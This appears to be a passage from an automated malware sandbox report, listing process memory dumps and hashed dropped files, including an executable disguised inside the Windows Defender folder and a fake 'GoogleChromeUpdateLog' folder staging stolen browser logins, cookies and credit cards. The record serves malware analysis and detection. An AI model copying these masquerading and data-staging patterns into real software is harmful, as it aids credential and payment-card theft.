memory/5728-404-0x000001EF7FFF0000-0x000001EF7FFF1000-memory.dmp
memory/2856-1692-0x00000000005A0000-0x0000000000932000-memory.dmp
memory/5808-1698-0x00000137799B0000-0x00000137799B8000-memory.dmp
memory/2856-1709-0x000000001C220000-0x000000001C246000-memory.dmp
memory/2856-1715-0x0000000001020000-0x000000000102E000-memory.dmp
memory/2856-1717-0x000000001B670000-0x000000001B68C000-memory.dmp
memory/2856-1722-0x000000001C2A0000-0x000000001C2F0000-memory.dmp
memory/2856-1724-0x0000000001040000-0x0000000001050000-memory.dmp
memory/2856-1729-0x000000001C250000-0x000000001C268000-memory.dmp
memory/2856-1731-0x000000001B650000-0x000000001B660000-memory.dmp
memory/2856-1751-0x000000001B660000-0x000000001B670000-memory.dmp
memory/2856-1753-0x000000001C270000-0x000000001C27E000-memory.dmp
C:\ProgramData\шева.txt
| MD5 | 17bcf11dc5f1fa6c48a1a856a72f1119 |
| SHA1 | 873ec0cbd312762df3510b8cccf260dc0a23d709 |
| SHA256 | a7bf504871a46343c2feab9d923e01b9dca4e980b2e122ad55fd4dbb3f6c16d9 |
| SHA512 | 9c12db4c6a105e767ff27048d2f8f19de5c9721ce6503dbb497aedcc1fc8b910a6fa43ec987fecd26794aff7440cb984744698fec5741dd73400a299dc3b2a25 |
memory/2856-1758-0x000000001C280000-0x000000001C28E000-memory.dmp
memory/2856-1760-0x000000001C310000-0x000000001C322000-memory.dmp
memory/2856-1762-0x000000001C290000-0x000000001C2A0000-memory.dmp
memory/2856-1764-0x000000001C330000-0x000000001C346000-memory.dmp
memory/2856-1766-0x000000001C350000-0x000000001C362000-memory.dmp
memory/2856-2079-0x000000001C8A0000-0x000000001CDC8000-memory.dmp
memory/2856-2099-0x000000001C2F0000-0x000000001C2FE000-memory.dmp
memory/2856-2123-0x000000001C300000-0x000000001C310000-memory.dmp
memory/2856-2133-0x000000001C3A0000-0x000000001C3B0000-memory.dmp
memory/2856-2143-0x000000001C410000-0x000000001C46A000-memory.dmp
memory/2856-2157-0x000000001C3B0000-0x000000001C3BE000-memory.dmp
memory/2856-2162-0x000000001C3C0000-0x000000001C3D0000-memory.dmp
memory/2856-2175-0x000000001C3D0000-0x000000001C3DE000-memory.dmp
memory/2856-2183-0x000000001C470000-0x000000001C488000-memory.dmp
memory/2856-2186-0x000000001C620000-0x000000001C66E000-memory.dmp
C:\Program Files (x86)\Windows Defender\uk-UA\systeminfo.exe
| MD5 | 5fe249bbcc644c6f155d86e8b3cc1e12 |
| SHA1 | f5c550ab2576d2daeff9cb72a4d41d1bcfee0e6d |
| SHA256 | 9308b0ce7206c60517db7207c488b4fa1cc313413e5378d8bac63b22cabcdd80 |
| SHA512 | b210c6b5d8db31d8f4ea82a79fe4679ced289636570e3fd72a45c488fd2cd75ed74677d723c1bfa67432e46e71901cb6551595e1053448c2f5e297829a6e1b39 |
memory/6504-2352-0x000002AB8C550000-0x000002AB8CAF0000-memory.dmp
memory/6504-2629-0x000002ABA7E70000-0x000002ABA7E7A000-memory.dmp
memory/6504-2630-0x000002ABA7EF0000-0x000002ABA7F5A000-memory.dmp
memory/6504-2673-0x000002ABA81E0000-0x000002ABA821A000-memory.dmp
memory/6504-2674-0x000002ABA81A0000-0x000002ABA81C6000-memory.dmp
memory/6504-2681-0x000002ABA8220000-0x000002ABA82D2000-memory.dmp
memory/6504-2703-0x000002ABA8F70000-0x000002ABA929E000-memory.dmp
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db
| MD5 | f310cf1ff562ae14449e0167a3e1fe46 |
| SHA1 | 85c58afa9049467031c6c2b17f5c12ca73bb2788 |
| SHA256 | e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855 |
| SHA512 | 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad |
memory/6504-2729-0x000002ABA92A0000-0x000002ABA92B2000-memory.dmp
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db
| MD5 | 9618e15b04a4ddb39ed6c496575f6f95 |
| SHA1 | 1c28f8750e5555776b3c80b187c5d15a443a7412 |
| SHA256 | a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab |
| SHA512 | f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26 |
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\login_data_db
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db
| MD5 | a1eeb9d95adbb08fa316226b55e4f278 |
| SHA1 | b36e8529ac3f2907750b4fea7037b147fe1061a6 |
| SHA256 | 2281f98b872ab5ad2d83a055f3802cbac4839f96584d27ea1fc3060428760ba7 |
| SHA512 | f26de5333cf4eaa19deb836db18a4303a8897bf88bf98bb78c6a6800badbaa7ab6aeb6444bbbe0e972a5332670bdbb474565da351f3b912449917be21af0afb8 |
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\cookies_db
| MD5 | 17141355c3716c4dbbdf5d4e61c3a8ef |
| SHA1 | 8f90ca8eb5296ff1564d8dc6b6a693e977d998d4 |
| SHA256 | 86410035eef0cfc78737f7b84a8d287dbca5667aadeabf2e2f9d65c82b7bb604 |
| SHA512 | eae25322290fc6325dce38f841cbf86ec7beba242111d8317c1748ea363007451b78fcaff5b7682043e0c751c58d60378ee5a604db2821a465a3b56d788a4cd6 |
memory/2468-2807-0x00000225748C0000-0x00000225748DC000-memory.dmp
memory/2468-2811-0x00000225748E0000-0x0000022574995000-memory.dmp
memory/2468-2828-0x00000225748B0000-0x00000225748BA000-memory.dmp
memory/2468-2840-0x0000022574B00000-0x0000022574B1C000-memory.dmp
memory/6632-2875-0x00000000008E0000-0x0000000000C72000-memory.dmp
memory/2468-2891-0x0000022574AE0000-0x0000022574AEA000-memory.dmp
memory/2468-2895-0x0000022574B40000-0x0000022574B5A000-memory.dmp
memory/2468-2896-0x0000022574AF0000-0x0000022574AF8000-memory.dmp
memory/2468-2897-0x0000022574B20000-0x0000022574B26000-memory.dmp
memory/2468-2898-0x0000022574B30000-0x0000022574B3A000-memory.dmp
memory/2428-3171-0x00007FFCAE620000-0x00007FFCAE643000-memory.dmp
memory/2428-3170-0x00007FFCB5C50000-0x00007FFCB5C5F000-memory.dmp
memory/2428-3179-0x00007FFCA5200000-0x00007FFCA5233000-memory.dmp
memory/2428-3178-0x00007FFCB1B50000-0x00007FFCB1B5D000-memory.dmp
memory/2428-3177-0x00007FFCAE600000-0x00007FFCAE619000-memory.dmp
memory/2428-3184-0x00007FFC9EF10000-0x00007FFC9F02C000-memory.dmp
memory/2428-3183-0x00007FFCAE820000-0x00007FFCAE82D000-memory.dmp
memory/2428-3182-0x00007FFCADC50000-0x00007FFCADC64000-memory.dmp
memory/2428-3181-0x00007FFC9EDE0000-0x00007FFC9EEAD000-memory.dmp
memory/2428-3180-0x00007FFC9D610000-0x00007FFC9DB32000-memory.dmp
memory/2428-3176-0x00007FFC9F0F0000-0x00007FFC9F267000-memory.dmp
memory/2428-3175-0x00007FFCA7600000-0x00007FFCA7623000-memory.dmp
memory/2428-3174-0x00007FFCAE650000-0x00007FFCAE669000-memory.dmp
memory/2428-3173-0x00007FFCA9810000-0x00007FFCA983D000-memory.dmp
memory/2428-3172-0x00007FFC9DB40000-0x00007FFC9E129000-memory.dmp